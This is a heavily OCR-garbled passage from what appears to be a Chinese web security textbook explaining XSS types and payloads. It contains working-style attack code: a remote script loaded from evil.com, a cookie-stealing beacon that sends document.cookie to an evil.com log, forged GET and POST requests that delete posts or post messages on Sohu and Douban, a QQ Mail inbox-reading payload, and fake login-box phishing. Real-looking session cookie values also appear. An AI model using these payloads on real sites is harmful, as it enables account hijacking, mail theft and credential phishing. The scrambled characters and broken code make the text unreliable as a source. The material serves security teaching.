<div><script>alert(/xss/)</script></div> 


用 户 输入 的 Script 脚本 ， 已 经 被 写 入 页 面 中 ， 而 这 显然 是 开发 者 所 不 布 
望 看 到 的 。 


上 面 这 个 例子 ， 就 是 XSS 的 第 一 种 类 型 : 反射 型 XSS © 

XSS 根 据 效 果 的 不 同 可 以 分 成 如 下 几 类 。 

第 一 种 类 型 : 反射 型 XSS 

反射 型 XSS 只 是 简单 地 把 用 户 输入 的 数据 “反射 ?给 浏览 器 。 也 就 是 说 ， 

墨客 往往 需要 诱 使 用 户 “ 上 点击” 一 个 恶意 链接 ， 才 能 攻击 成 功 。 反 射 型 

XSS 也 叫做 * 非 持久 型 XSS” (Non-persistent XSS) 

第 二 种 类 型 : 存储 型 XSS 

输入 的 数据 “存储 ”在 服务 絮 端 。 这 种 XSS 具 有 很 强 
JA AE. HE ° 

LEURS ILTEN, IDEE B—Bm UG x JavaScript e 3 HJ 

博客 文章 ， 文 章 发 表 后 ， 所 有 访问 该 博客 文章 的 用 户 ， 都 会 在 他 们 的 

浏览 器 中 执行 这 段 恶 意 的 JavaScript 代 码 。 黑 客 把 恶意 的 脚本 保存 到 服 

务 器 端 ， 所 以 这 种 XSS 攻 击 就 叫做 “存储 型 XSS”。 

存储 型 XSS 通 常 也 叫做 “持久 型 XSS”(Per-sistent XSS)， 因 为 从 效果 上 来 

说 ， 它 存在 的 时 间 是 比较 长 的 。 

第 三 种 类 型 DOM Based XSS 

实际 上 ， 这 种 类 型 的 XSS 并 非 按照 “数据 是 否 保存 在 服务 器 端 ? 来 划分 ， 

DOM Based XSS 从 效果 上 来 说 也 是 反射 型 XSS。 单 独 划 分 出 来 ， 是 因 

为 DOM Based XSS 的 形成 原因 比较 特别 ， 发 现 它 的 安全 专家 专门 提出 
了 这 种 类 型 的 XSS。 出 于 历史 原因 ， 也 就 把 它 单独 作为 一 个 分 类 了 。 

通过 修改 页 面 的 DOM 节 点 形成 的 XSS， 称 之 为 DOM Based XSS 。 

看 如 下 代码 : 


<script 


.getElementById("text").value; 
documen t.getElementById("t").innerHTML = 

"<a href='"+str+"' >testLink</a>"; 

} 


documen 


sre 会 在 当前 页 面 插入 一 个 超 链接 ， 其 地 址 为 文本 框 
容 : 


testLink 


fel el 

在 这 里 , "write" FZ 4H BJ onclick & fF Vil FA T test() EN ZA © Tf] f£ test() ER AX 
rH. AT WIBIBJDOM T A, 3SilinnerHTML3jE — Ez FJ P? 2098 25 fit 
HTML 写 入 到 页 面 中 ， 这 就 造成 了 DOM basedXSS ° 

构造 如 下 数据 : 


' onclick=alert(/xss/) // 


BASS SIEM BLS Be : 
HAA ID Met — TS, 然后 插入 一 个 onclick 事 
BUCS ERATE RE ma o e 


这 个 新 生成 的 链接 ， 脚 本 将 被 执行 


ti/aee/) // write | 


恶意 脚本 被 执行 
实际 上 ， 这 里 还 有 另外 一 种 利用 方式 除了 构造 一 个 新 事件 外 ， 还 
ge Pn tmr HON 


><img src=# oner -alert(/xss2/) /»«' 


页 面 代码 变 成 T. 


href= img =# onerror=alert(/xss2/) / 
'' >te s nk< uds 


= ; 


C= 


恶意 脚本 被 执行 


3.2 XSS 攻 击 进 阶 
3.2.1 初探 XSS Payload 
m NDA SR » PERSE, EMOTE AR EK Aa PXSS 


XSS 攻 击 成 功 后 ， 攻 击 者 能 够 对 用 户 当 前 浏览 的 页 面 植 入 恶意 脚本 ， 

过 恶意 脚本 ， 控 制 用 户 的 浏览 器 。 这 些 用 以 完成 各 种 具体 功 角 EE I 

脚本 ， 被 称 为 “XSS Payload” ^ 

XSS Payload 实 际 上 就 是 JavaScript 脚 本 〈 还 可 以 是 Flash 或 其 他 富 客户 端 

A n ， 所 以 任何 JavaScript 脚 本 能 实现 的 功能 ，XSS Payload 都 能 做 
I| o 

一 个 最 常见 的 XSS Payload， 就 是 通过 读 取 浏览 器 的 Cookie 对 象 ， 从 而 

ARE“ Cookies FF” Wik ° 

Cookie 中 一 般 加 密 保 存 了 当前 用 户 的 登录 凭证 。Cookie 如 果 丢 失 ， 往 往 

意味 着 用 户 的 登录 和 任 证 丢失 。 换 句 话 说， 攻击 者 可 以 不 通过 密码 ， 而 

直接 登录 进 用 户 的 账户 。 

如 下 所 示 ， 攻击 首先 几 载 一 个 六 远程 脚本 : 


eue //www.a.com/test.htm?abc-"»«script 
c-http://www.evil.com/evil.js ></script> 


真正 的 XSS Payload 写 在 这 个 远程 脚本 中 ， 避 免 直 接 在 UREL 的 参数 里 写 
入 大 量 的 JavaScript 代 码 。 


在 RE 2 可 以 通过 如 下 代码 窃取 Cookie: 


lo ie); 
doc x ib ody.appen ndchi id mg); 


这 段 代码 在 页 面 中 插入 了 一 张 看 不 见 的 图 片 ， 同 时 把 document.cookie 对 
象 作 为 参数 发 送 到 远程 服务 器 。 
事实 上 ，http: /wwwevilcom/log 和 并 个 一 定 妥 存在 ， 因为 这 个 请 求 会 在 远 
程 服务 器 的 web 日 志 中 留 下 记录 : 


Lu 0.0.1 - - [19/Ju1/2010:11:30:42 +0800] 
"GET /log?cookie1%3D1234 HTTP/1.1" 404 288 


a = do ateElem im img"); 
che: = "http: de D C com 
xg 


XE, s 完成 了 一 个 最 简单 的 贸 取 Cookie 的 XSS Payload o 

LAURI RI VEI Coolae X3 E EUR HOR RS DUNVCRI FI EL XE X. 
Cookie 访 问 网 站 ”的 过 程 是 一 样 的 ， 参 考 如 下 过 程 。 

在 Firefox 中 访问 用 户 的 百度 空间 ， 登 录 后 查看 当前 的 Cookie: 


TT 
大 风 起 今 去 飞扬 


Security just lik3 a girl. BOth of th3m h4ve sOme hüles. YOu alwdys try to find the hOle, but nOt 3very tim3 yOu c4n 3xplt 
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文章 列表 Esse 
ELI BA jav ERAH 


KA http: /fhi. baidu. com AIM MN : 


BAIDUID=EEDSCOTSF 1 2B92CSCBAET4F7SCD42344 : FG=1; BDSTAT-Bcf2c84dc33da581546 dddl d2909ca201baeda32T39441 43b94bdl 13TT He 
J.MI-z1; Mm lvt eedecBücb31594T0£2c25a22dl aGfefT c=1264397701240; Hm_lvt_4dlGad3b9adadeSb5b2e5f6403.a0l cSd=127840625312 
BISP=4bd1 TObG838aabl edi d3e0fcBTGe520e694T261 eb3TOl4ecfedfealbTFebTOIcISdTOcHSbcTIFSdHS ded! OObaal cdi1T28b4T10b812c€ 
BDSPINF0-8099ccf3c95b9b23T20eecad | aullikS |aullik5 | e865ea20d48737 ab332e3c20b64ef913: 
BDUSSZVZUNZzÜClrMEdaWVV2RkhLZS1aaldIQURDbWNZZFRSTWItVWxOT jBHWDZ  V3RNQVFBQUFB JCQAAAAAAAAAAApBDVkmusUETXVsbGlrNQAAAAS 
BDOPINFO=6099ec£3c9Sb9b23720eecad | aullik5 | aullik5 |e865ea20d4873Tab332e3c20b64ef913; IM_old=0|gbswws65 

确定 


WA SRSEES | ioi | RIS LE 021 1E 134 


查看 当前 页 面 的 Cookie 值 
然后 打开 下 ， 访 问 同 一 个 页 面 。 此 时 在 IE 中 ， 用 户 是 未 登 孙 状态 : 


SARON ERIT 


ec Iam baida cst ei =| E x Fg 万 
INO wur MV MAV IAD Who = - = 


RERA BARROS LR TTA R- Q- ^ FRo- R20- IAD- 5 90-429» : 


ARMREST UH 


主页 | SE | 相册 | 个 人 箱 常 FR 
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BALZAC ERHAN 2 miks 
SEAR , 

2 i a e 

Suwt32 3E MCRIDIAGCIE I IRR. IRUUSPOCERORHE CR, EUR 6. TTD HE neesc a TIE 

MET. RETENCAST, 9. 


Ipstlweoe PABA ma THREE IU oe, 
cur 
AR- F. t NRE tin \; 
再 强调 pem TIi*Pi*d ER 240 人 加 好 为 杂文 
HFE Bais 


GXEiAR Bunge 


Aie PRES — MR spring maf — PORTA. RENE eat Korea 


用 户 处 于 未 登录 状态 


将 Firefox 中 登录 后 的 Cookie 记 录 下 来 ， 并 以 之 替换 当前 了 正中 的 Cookie ° 
重新 发 送 这 个 包 : 


MSIE 7.0, Windows NT 5 1; Trident4 0, NET CL 
24050727, NET CLR 304508 2157, NET CLR 3 5 30729, InfoPath 2) Paros/32 t 
3 
Proy Connector keep aive 
M dada com 
apma nocache 


sot. BAIDUIDSEEDG C97 SF 1 269020 0C6AE 74F 75CO4 2244 f Ont, GOSTAT sé cfc 
048c3343581545324132909:2201 baed4377 339421 413094021137 790121, BD TIPS 1 
279166004-0.0-124523$129, BO_UTK_OVT=1, EDx0, USERID= 2451729100270844 zi 


使 用 同一 Cookie 值 重新 发 包 
通过 返回 的 页 面 可 以 看 到 ， 此 时 已 经 登录 进 该 账户 : 


LO Resend X 


Request Response | 


HTTP/1.1 200 OK 

Date: Mon, 19 Jul 2010 05:43:19 GMT 

Server: apache 1.1.26.0 

Set-Cookie: BDSP=4bd1 70b6838aa61ed1 d3elfc678e520e694 7261 eb3701 4ccfeBfc 
al67f3e6/09c93d7 Ocf3be 7 8f3df8dcd100baalcdi1728b4710h812c8fcc3cec3fdfcQ3 
9245d688d43f8794a4c27d1ed?21b0ef41 bddadbeddce451da81 ch39dbb6fd5266d016 
0a2478e4:-Domain=.hi.baidu.com;Path=/ 

Set-Cookie: BDSTAT=6cf2c84dce33da581 546ddd1d2909ca201 baeda327394d143b9 
4bd11377f10e121;Domainz.hi.baidu.com;Pathz/;Expires2VWed, 28-Nov-37 01:45:46 G 
MT 

Set-Cookie: BDSP=deleted;Domain=.baidu.com;Path=!Expires=mMon,01-Jan-1970 0 
0:00:00 GMT =| 


sl--STATUS OK--> 
«html» «head» «meta http-equiv-content-type content-"text;ihtml; charsetzgb2312"» 
«link rel="alternate" type="applicationirss+xm|" title=" 订 [isse] Boat zer €" href-"htt 
pAihi.baidu.com/aullik5/rss"» 

«style type="texticss"> 

#layout{table-layouttixed} 

#layout td.c2t1(padding-left:1 0px} 

#layout td.c2t2{width:20px} 

#layout td.c2t3{padding-right:1 0px width:24% } 

</style> 

s/head= 

<body> 

<center> 

«script» 


xl-- 


(functionQ( =| 


返回 登录 后 的 状态 页 面 
验证 一 下 ， 把 返回 的 HTML 代 码 复 制 到 本 地 打开 后 ， 可 以 看 到 右上 角 显 
示 了 账户 信息 相关 的 数据 : 


AMR OE Ký AE Tindors Internet Explor er 

Ris ë p:/fawy. a. con/ test. html 
v) http://www, a, jtestl, htm 

AS 


THO) MU FEV MAO IAD WO 
DRE 后 友人 EEDA [rcm EO 820+ TRO: 


| aulik5 hij ouo ooy) | RASA v | AVA v | SANE v | 
AME uh 


Security just lk3 a girl BOth of th3m hdve sOme bles. YOu alwys try to flnd the hOle, but n0t 3very tim3 yOu c4n 3xplOttit! 
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返回 页 面 是 已 登录 状态 

通过 XSS 攻 击 ， 可 以 完成 *Cookie 劫 持 ” 攻 击 ， 直 接 登 录 进 用 户 的 
J o 

这 是 因为 在 当前 的 Web 中 ，Cookie 一 般 是 用 户 登 录 的 赁 证， 浏览 器 发 起 
的 所 有 请 求 都 会 自动 带 上 Cookie。 如 有 果 Cookie 没 有 绑 定 客户 端 信息 ， 当 
攻击 者 窃取 了 Cookie 后 ， 束 可 以 不 用 密码 登录 进 用 户 的 账户 。 

Cookie 的 “HttpOnly” 标 识 可 以 防止 *Cookie 支 持 ”， 我 们 将 在 稍 后 的 章节 
中 再 具体 介绍 。 


3.22 ”强大 的 XSS Payload 

ETSERI AAR Tj Cookiek XSSPayload ° ERTE, HNA 

一 些 更 为 强大 的 XSSPayload。“Cookie 动 持 ” 并 非 所 有 的 时 候 都 会 有 效 。 

有 的 网 站 可 能 会 在 Set-Cookie 时 给 关键 Cookie 植 入 HttpOnly 标 识 ; 有 的 

网 帝 则 可 能 会 把 Cookie 与 客户 VIP (相关 内 容 在 “XSS 的 防御 ”一 

中 会 具体 介绍 ) ， 从 而 使 得 XSS 窃 取 的 Cookie 失 去 意义 。 

RS 在 XSs 攻 击 成 功 后 ， 攻击 者 仍然 有 许多 方式 能 够 控制 用 户 的 
|o gg ö 

3.2.2.1 构造 GET 与 POST 请 求 

一 个 网 站 的 应 用 ， 只 需要 接受 HTTP 协 议 中 的 GET 或 POST 请 求 ， 即 可 

完成 所 有 控 作 。 对 于 攻击 者 来 襄 ， 仪 通过 JavaScript， 就 可 以 让 浏览 器 

发 起 这 两 种 请 求 。 


比如 在 Sohu 博 客 上 有 一 篇 文章 ， 想 通过 XSS 删 除 它 ， 该 如 何 做 呢 ? 


wadal a 


on” mmo sesse + omoa 
ves 


Sra 


sohu 博客 页 面 

假设 Sohu 博 客 所 在 域 的 某 页 面 存 在 XSS 漏 润 ， 那 么 通过 JavaScript， 这 
个 过 程 如 下 。 

正常 删除 该 文章 的 链接 是 


http://blog.sohu.com/manage/entry.do? 
m-delete&id-156713012 


对 于 攻击 者 来 说 ， 只 需要 知道 文章 的 id， 就 能 够 通过 这 个 
文章 了 。 在 本 例 中 ， 文章 的 id 是 156713012。 


攻击 音 可 以 通 过 捅 入 张 图 片 来 发 起 一 个 GET 请 求 : 


eateElem puc ing"); 
com. anage/ 


请 求 删 除 这 篇 


entr 
doc nt. body.appendChild(img); 


攻击 者 只 需要 让 博客 的 作者 执行 这 段 JavaScript 代 码 (XSS Payload) , 
就 会 把 这 篇 文章 删除 。 在 具体 攻击 中 ， 攻 击 者 将 通过 XSS 诱 使 用 户 执 行 
XSS Payload ° 

再 看 一 个 复杂 点 的 例子 。 如 果 网 站 应 用 者 接受 POST 请 求 ， 那 么 攻击 者 
如 何 实施 XSS 攻 击 呢 ? 


下 例 是 Douban 的 一 处 表单 。 攻 击 者 将 通过 JavaScript 发 出 一 个 POST 请 
求 ， 提 交 此 表单 ， 最 终 发 出 一 条 新 的 消息 。 

在 正常 情况 下 ， 发 出 一 条 消 恩 ， 浏 贤 姐 发 的 包 是 : 

E douban request. tzt - BE = 


HE) 编辑 正 ) dst S50) 帮助 册 


User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.7) Gecko/20100701 
Firefox/3.6.7 

Accept: text/html, application/xhtml*xml, application/xml;q-0.89,*/*;q-0.8 
Accept-Language: zh-cn 

Accept-Encoding: gzip, deflate 

Accept-Charset: GB2312,utf-8;q-0. T,*; q-0. T 

Keep-Alive: 115 

Connection: keep-alive 

Referer: http://www. douban. com/ 

Cookie: bid-"FXJBnioAcRY'; 

. utma-30149280.810225150.1269445014. 1279516867. 1279523075. 28 ; 

- utnz-30149280. 1276940877. 16. 4. utncsr-baidu|utncen- (organic) |utmemd-organic|utmetr=% 
C2XCCXD2XFOXBBXF3XCANXB2NCS3XBANBAXC3NB3XDA4; ue-"opensystemGgmail. com”; 

| utmv-30149280. 131; 

|. gads-ID-e8340dd62d2b4986a:T-1250063046:S-ALNI MZH5dB3FWWVarUjOlpiPhgPTAgL1GA; 
11=°118172°; wiewed-/4723970 4163838 1417905"; f-content; dbcl2- 1318750:M1aIOZ8DuBc"; 
report=; ck-^JiUY ; ^ utmc-30149280; _ utmb-30149280. 2. 10. 1279523075 


ck-]iUY&mb text-XE5X81XBAXEdWBSNAAXEDNBOXSFNEGNB5SXSBNESNAFNO5 


Douban 上 发 新 消息 的 请 求 包 
要 模拟 这 一 过 程 ， 有 两 种 方法 。 第 一 种 方法 是 ， 构 造 一 个 form 表 单 ， 
然后 目 动 提 区 这 个 表单 : 


var f = document.createElement("form"); 
f.action = ""; 

f.method = "post"; 

document .body.appendChild(f); 

var ii = document.createElement ("input"); 
ii.name = " ck"; 

ii.value = " JiUY"; 

f.appendChild(i1); 

var i2 - document.createElement("input"); 
i2.name - " mb text"; 


i2.value - "testtesttest"; 
f.appendChild(i2); 
f.submit(); 


如 末 表 单 的 参数 很 多 的 话 ， 通 过 构造 DOM 玉 点 的 方式 ， 代 码 将 会 非常 
iE 这 样 会 使 得 整个 代码 精简 很 多 ， 如 
ZN: 


var dd = document.createElement("div"); 
document .body.appendChild(dd); 

dd.innerHTML = '<form action="" 
method="post" id="xssform" name="mbform">'+ 
"<input type="hidden" valuez"JiUY" 

name-z"ck" />'+ 

"<input type="text" value-"testtesttest" 
name="mb_text" />'+ 

'</form>' 

document .getElementById("xssform").submit(); 


目 动 提 区 表单 成 功 : 


Dido pg. ai RAEN ame mt MRA 


Xll, axis 
EJ 5s 


} aisi : 
D 
| testtesttest »» 回应 


aisi : 


Rik 推荐 由 


testtesttest »» EI 


AH A gE AA RU 
第 二 种 方法 是 ， 通 过 XMLHttpRequest 发 送 一 个 POST 请 求 : 


var url = "http://www.douban.com"; 
var postStr - "ck-JiUY&mb text-test1234"; 
var ajax - null; 
if (window. XMLHttpRequest) { 
ajax = new XMLHttpRequest(); 


BRER ae 


else if (window.ActivexObject) { 

ajax = new 

ActivexObject ("Microsoft .XMLHTTP") ; 
} 


else{ 
return; 


ajax.open("POST", url, true); 
ajax.setRequestHeader ("Content - 
Type", "application/x-www-form-urlencoded"); 
ajax.send(postStr); 
ajax.onreadystatechange = function(){ 

if (ajax.readyState == 4 && ajax.status 
== 200){ 

alert("Done!"); 


} 


再 次 提交 成 功 : 


gH Sie NEL SEs Aa eS BAB axist 


Fido bg. #7 sess RNA MA MAZA 


bh ， 
欢迎 ，axis 
BE 
axisit : 
j testi 234 » Eli 
Ri | 
axis 1 小 时 前 说 ， mh 
testtesttest + 回应 
ARARE 


通过 XMLHttpRequest 发 消息 成 功 

通过 这 11 个 例子 可 以 青 楚 地 看 到 ， 使 用 JavaScript 模 拟 浏览 器 发 包 并 不 是 
一 件 困难 的 事情 

所 以 XSS 攻 击 后 ， 攻 击 者 除了 可 以 实施 “Cookie 动 持 ” 外 ， 还 能 够 通过 模 
拟 GET、POST 请 求 操作 用 户 的 浏览 器 。 这 在 某 些 隅 离 环 境 中 会 非常 有 
用 比如 "Cookie 动 村 "失效 时 ， 或 者 目标 用 户 的 网 络 不 能 访问 互联 网 和 
这 个 例子 将 演示 如 何 通 过 XSS Payload 读 取 QMail 用 户 的 邮件 文件 


首先 看 看 正 币 的 请 求 定 如 何 获取 到 所 有 的 邮件 列表 的 。 有 登 孙 邮箱 后 ， 
可 以 看 到 : 


cM Oga com> 7 
Ma ile QQ L m 邮箱 首页 | 设置 - 换 肤 


LTÀ aaa. com. 


[3 邮件 : 46 封 未 读 邮 件 
收 件 箱 (33) 群 邮件 (13) 阅读 空间 (79) 


RPE (33) 

群 邮 件 (13) 

E1818 邮箱 推荐 
已 发 送 


EAS aed 给 邮件 添加 备注 
PETI - WEE i EEAERESR. TRA 


QQ 邮件 订阅 


QQ 邮箱 的 腹面 


点 击 “ 收 件 箱 ” 后 ， 看 到 邮件 列表 。 抓 包 发 现 浏 贤 郁 发 出 了 如 下 请 求 : 


http://m57.mail.qq.com/cgi-bin/mail list? 
sid=6alhx3p5yzh9a20m7U51dDyz&folderid=1&page 
=0&s=inbox&loc=folderlist,,,1 


收 件 箱 (3566 封 ， 其 中 未 该 邮件 33 A) 
LH | oeme | sex | 举报 | 标记 为 ， v BEA. v 
记 | 加 | 发 件 人 主题 

此 次 件 夹 中 有 33 封 未 读 邮 件 ， 您 可 以 全 部 标 为 已 去 或 彻底 删除 所 有 3 
上 周 (2 封 ) 


D o QQ 邮箱 管理 员 这 张 贺 卡 能 " 防 导 降温 "3? - 夏 日 专题 亲爱 的 QQ 邮箱 用 户 ; 今夏 持续 高 温 , 气象 台 发 出 : 
[| «s ë QQ 邮箱 管理 员 “ 好 友 生 日 提醒 服务 

FẸ (23 封 ) 

T c we 申请 开通 Whitehat Community 群 邮件 功能 

[ A QQ 会 员 项 目 组 “ 蒜 喜 您 升级 为 YIP2 会 员 了 - 恭喜 您 升级 为 MIP2 会 员 ! 从 现在 起 您 将 全 面 进 六 新 成 长 阶 且 
[ 加 REME 你 永远 不 知道 你 会 从 中 学 到 些 什 么 .….. - ”现在 的 时 间 是 : 2010 年 5 月 3 日 你 的 全 名: Ed 
C =| wee RMA MA ASR -Ho 我 是 F 通 被 情 了 ,我 和 朋友 们 每天 间 
[ | ABRE ARMARE ARR - Hi ,我 是 Bee XGREIBWIST. 我 和 朋友 站 每 开间 
[ s meee ABNEEERAREMIS - H ,我 号 BRA REMSHERST. 我 和 朋友 站 每 开间 
L QQ 会 员 项 目 组 “ 基 吉 您， 您 的 QQ 年 费 会 员 已 成 功 开通 。 - FPA - vip,qq.com FHUAR 


QQ 邮箱 的 邮件 列表 
经 过 分 析 发 现 ， 真 正 能 访问 到 邮件 列表 的 链接 是 : 


http://m57.mail.qq.com/cgi-bin/mail list? 
folderid=1&page=0&s=inbox&sid=6alhx3p5yzh9a2 
om7U51dDyz 


MIO icm ween een 


Pray 


群 邮件 (13) 


( <form targetz"actionFrame" method="POST” actionz"/cgi-bin/foldermgr?sid-&alhz3p5yzh9a2omTUS1dDyz" namez"submit form"? 
script? 
<div class="fdbody bodybebt"> </div> 
<div id="leftPanel” class="newskinbody"> 
<script> 
E <div id=“mainFrameContainer”> 
E <iframe idz"mainFrame" frameborderz"no" hidefocus="" name="mainFrame” syc="/cgi-bin/mail_list?folderid=1tpage=0bs=inboxt 
si dz6a1hz 3p57 zh9a2onTUS1 dDy ^? 
<html> 
(iframe? 
</div> 


在 singe ead valine 


里 有 一 个 无 法 直接 构造 出 的 参数 值 : sid。 从 字面 推测 ， 这 个 sid 参 数 
应 读 是 用 户 古训 阁 后 的 管 。 


所 以 ，XSS Payload} AA zE CRW Esih, 然后 构造 完整 的 URL， 
并 使 用 XMLHttpRe-quest 请 求 此 URL， 应 该 就 能 得 到 邮件 列表 了 。 
XSSPayload 如 下 : 


if 

(top.window.location.href.indexOf("sidz")20)[ 
var sid - 

top.window.location.href.substr(top.window.lo 

cation.href.indexOf("sid-z") 

*4,24); 


var folder url = 
"http://"*top.window.location.host*"/cgi-bin/ 
mail list?folderid- 
1&page=0&s=inbox&sid="+sid; 
var ajax = null; 
if (window. XMLHttpRequest) { 

ajax = new XMLHttpRequest(); 


3 

else if (window.ActivexObject){ 
ajax = new 

ActivexObject ("Microsoft .XMLHTTP") ; 


else{ 
return; 


ajax.open("GET", folder_url, true); 
ajax.send(null); 
ajax.onreadystatechange = function(){ 

if (ajax.readyState -- 4 && ajax.status 


执行 这 段 代码 后 : 


PV TTY icon 邮箱 首页 | 设置 -执导 


收 件 箱 ( 共 66 封 ， 其 中 未 读 邮 件 33 封 ) 


KA http://a5T. mail. qq. com 的 页 面 说 : 


<IDOCTYPE html> 

<script? 

document. domainz"qq. com" ; 
function getTop () 

{ 


群 邮件 (13) 


var oSelffunc = arguments. callee; 
if (| oSelffunc. moTop) 


d {try{_oSelfFunc. _moTop=window!=parent? (parent. getTop?parent. getTop (): parent. parent. ; 
已 发 送 {_oSelfFunc, moTop=window;}} 
EB return oSelfFunc. moTop; 
A } 
His try{window, top=getTop O ;] catch (e) {eval (“var top=getTop();");} 
(function () 
QQ 邮件 订阅 { 
if (window==getTop ()) {document. write( <seript zrez"http: //rescdn. qqnail. com/zh_CH/h: 
me 
获取 邮件 内 容 


邮件 列表 的 内 容 成 功 被 XSS Payload 获 取 到 。 

攻击 者 获取 到 邮件 列表 的 内 容 后 ， 还 可 以 读 取 每 封 邮件 的 内 容 ， 并 发 
送 到 远程 服务 器 上 。 这 只 需要 构造 不 同 的 GET 或 POST 请 求 即 可 ， 在 此 
不 再 袭 述 ， 有 兴趣 的 读者 可 以 自己 通过 JavaScript 实 现 这 个 功能 。 

3.2.2.2 XSS 钓 鱼 

Xss 并 非 万 能 。 在 前 文 的 例子 中 ，XSS 的 攻击 过 程 都 古 在 浏览 器 中 通 
JavaScript 脚 本 上 自动 进行 的 ， 也 吏 是 说 ， 缺 少 “ 与 用 户 交 互 ? 的 过 程 。 

比如 在 前 艾 提 到 的 “通过 POST 表 单 发 消 居 ”的 案例 中 ， 如 采 在 提交 表单 
时 要 求 用 户 输入 验证 码 ， 那么 一 般 的 XSS Payload 都 会 失效 ， 此 外 ， 在 
大 多 数 “ 修 改 用 户 密 码 ” 的 功能 中 ， 在 提交 新 密码 前 ， 都 会 要 求 用 户 输 
A “Old Password" ° 而 这 个 “Old Password”， 对 于 攻击 者 来 说 ， 往 往 是 
不 知道 的 。 

但 是 ， 这 就 能 限制 住 XSS 攻 击 吗 ? 答案 是 否定 的 。 

对 于 验证 码 ，XSS Payload 可 以 通过 读 取 页 面 内 容 ， 将 验证 码 的 图 片 
URL 发 送 到 远程 服务 器 上 来 实施 一 一 攻击 者 可 以 在 远程 XSS 后 台 接 收 当 


前 验证 码 ， 并 将 验证 码 的 值 返回 给 当前 的 XSS Pay-load， 从 而 绕 过 验证 
fH o 
(EOE AS AYIA] UT i ZR oe ATARE, Nuda A Xss “#4 
鱼 ” 相 结合 。 
实现 思路 很 简单 : 利用 JavaScript 在 当前 页 面 上 “ 画 出 ”一 个 伪 霹 的 登录 
框 ， 当 用 户 在 登录 框 中 输入 用 户 名 与 密码 后 ， 其 密码 将 被 发 送 至 黑客 
的 服务 器 上 o f | 


财经 FRI BR ES HB NAHE Re AR 数码 手机 下 载 ”时 尚 购物 旅游 杂志 d ER BSE FR bk OE x3 


v) eLong ion 
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© BERE avs naes 
tk 5: | axis 
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本 机 两 周 内 有 效 ， 请 不 要 在 了 网吧 或 公用 电脑 上 使 用 


MELA Err a E 
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通过 JavaScript 伪 造 的 登录 框 

充分 发 挥 想象 力 ， 可 以 使 得 XSS 攻 击 的 威力 更 加 巨大 。 

3.2.2.3 ”识别 用 户 浏览 器 

在 很 多 时 候 ， 攻 击 者 为 了 获取 更 大 的 利益 ， 往 往 需 要 准确 地 收集 用 户 
的 个 人 人 信息。 比如， 如 有 果 知 道 用 户 使 用 的 浏览 器 、 损 作 系统 ， 攻 击 者 
HLA Al BE 实施 一 次 精准 的 浏览 器 内 存 攻击 ， 最 终 给 用 户 电 脑 植 入 一 
木马 。XSS 能 够 帮助 攻击 者 快速 达到 收集 信息 的 目的 。 


如 何 通过 JavaScript 脚 本 识别 浏览 器 版 本 呢 ? 最 直接 的 莫 过 于 通过 XSS 
读 取 浏览 器 的 UserA- gent 寺 象 


alert(navigator.userAgent); 


K http://www. douban. com 的 页 面 说 : 


AN Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.7) Gecko/Z20100713 Firefox/3.6.7 


a bast’) UserA gents} & 
文 个 对 象 ， 告 诉 我 们 很 多 客户 端的 信息 : 
OS 版 本 : Windows NT 5.1 (这 是 Windows XP 的 内 核 版 本 ) 
浏览 器 版 本 : Firefox 3.6.7 
系统 语言 : zh-CN (简体 中 文 ) 
但 是 浏览 妖 的 UserAgent 是 可 以 伪造 的 。 比 如 ，Firefox 有 很 多 扩展 可 以 


屏蔽 或 目 定 义 浏 览 器 发 送 的 UserAgent。 所 以 通过 JavaScript 取 出 来 的 这 
个 浏览 器 对 象 ， 信 息 并 不 一 定 准确 。 


但 对 于 攻击 者 来 说 ， 还 有 男 外 一 种 技巧 ， 可 以 更 准确 地 识别 用 户 的 浏 
DEI 


F1 T 30] boas Z IRI BA] SA EE J| jd as zs EH SOUL EE 
特 的 功能 ， 而 同一 BUR SA E RIBCE IR SUR CER ° Br 
以 通过 分 PAE EEA bb at L YY Ae , WL BE TEE HH Fl HT EH 0] V t AK , 
而 几乎 不 会 误 报 。 这 种 方法 比 读 取 User-Agent 要 准确 得 多 。 
参考 以 下 代码 ， 


if (window. 人 // MSIE 6.0 or below 
// 判 断 是 否 是 IE 7 以 上 
if (document. a && typeof 
document. documentElement.style.maxHeight!- 
ao mes Jí 
// 判 断 是 否 是 IE 8+ 

if ( typeof document.adoptNode !- 
"undefined") ( // Safari3 & FF & Opera & 
Chrome 
& IE8 


//MSIE 8.0 ”因为 同时 满足 
前 两 个 if 判 断 ， 所 以 // 在 这 里 是 IE 8 


// MSIE 7.0 否则 就 是 IE 7 
return "msie"; 


else if (typeof window.opera !- "undefined") 
{ //Opera 独 占 

// "Opera " “window. opera. version() 

return "opera" 


} 
else if (typeof window.netscape != 
"undefined" ) { //Mozilla 独占 
// "Mozilla" 
// 可 以 准确 识别 大 版 本 
if (typeof window.Iterator != "undefined") { 

// Firefox 2 以 上 支持 这 个 对 象 

if (typeof document. és eg Iz 
"undefined") ( // Firefox 3 & Ope 

// Firefox 3 同时 满足 这 些 条 | MERDA 

是 Firefox 3 了 


J 
return "mozilla"; 


else if (typeof window.pageXOffset != 
"undefined") { // Mozilla & Safari 
//"Safari" 
try{ 


if (typeof 
external.AddSearchProvider !- "undefined") 
( // Firefox & Google Chrome 
//Google Chrome 
return "chrome"; 


} 
} catch (e) { 
return "safari"; 


} 


else { //unknown 
//Unknown 
return "unknown"; 


} 


这 段 代码 ， 找 到 了 几 个 浏览 器 独 有 的 对 象 ， 能 够 识别 浏览 器 的 大 版 
o 依据 这 个 思路 ， 还 可 以 找到 更 多 “独特 的 "浏览 器 对 Re 


全 研究 者 Gareth Heyes 曾 经 找到 一 种 更 巧妙 的 方法 ， 通 过 很 精简 的 代 
a 即 可 识别 出 不 同 的 浏览 器 。 


//Firefox detector 2/3 by DoctorDan 
FF=/a/[-1 ze 

//Firefox 3 

FF3- (Function ODI 5]=='x' 
//Firefox 2 

FF2= ncaa KOOL 6]== 

//IE detector I posted Heat 
IE='\v'=='v' 

//Safari detector by me 

Saf-/a/. pro m =='//' 

//Chrome by m 
Chrz/source/. testt t/a tostrinok ig) 
//Opera by me 

Op=/Afunction \(/.test([].sort) 
//IE6 detector using conditionals 
try {IE6=@cc_on @_jscript_version <= 
5.7&&@_jscript_build<10000 


Wet Aes) P uns is 

精简 为 一 行 代 码 ， 即 : 
B=(function XOHI- a x'?'FF3':(function 
x(){})[-6]=='x'?'FF2' 
[-1]=='a'?'FF':'\v'=='v A TES 
a/. "reta cor yy 2'Saf':/s/; 
test(/a/.toString)?'Chr':/^function 
N(/.test([].sort)?'Op': 'Unknown' 


